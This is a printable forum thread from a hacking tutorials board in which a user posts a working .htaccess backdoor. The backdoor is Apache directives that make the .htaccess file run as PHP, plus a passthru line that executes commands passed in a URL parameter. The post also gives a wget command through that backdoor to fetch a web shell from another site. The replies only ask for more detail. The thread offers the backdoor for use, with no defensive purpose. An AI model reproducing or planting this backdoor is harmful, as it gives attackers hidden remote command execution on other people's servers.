![]() |
|
Create Backdoor in .htaccess - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Tutorials (https://sinister.li/Forum-Tutorials) +--- Thread: Create Backdoor in .htaccess (/Thread-Create-Backdoor-in-htaccess) |
Create Backdoor in .htaccess - hacker625 - 05-16-2014 Firstly,I want to say thank my friend Mr.Sample :Grin: In this Tutorial we will create Backdoor in .htaccess(Hypertext access) Go public_html in shell and need to edit the .htaccess. :Sarcastic: PHP Code: <Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>Add or Save code in .htaccess. :Thumbs-Up: ![]() And need to type CMD Commands like this yoursite.com/.htaccess?cmd= For Shell Upolad yoursite.com/.htaccess?cmd=wget -O hacker625.php http://yourothersitewithshell/yourshell.txt ![]() okay now you can access your shell.. ![]() Have Fun :Sarcastic: RE: Create Backdoor in .htaccess - Yung Lean - 05-20-2014 I would appreciate full tutorial step by step. This looks like a quick tutorial with little explanation. RE: Create Backdoor in .htaccess - thewalker - 05-20-2014 Yes there is not much explained I agree. RE: Create Backdoor in .htaccess - bboyrai - 06-07-2014 i am not getting it |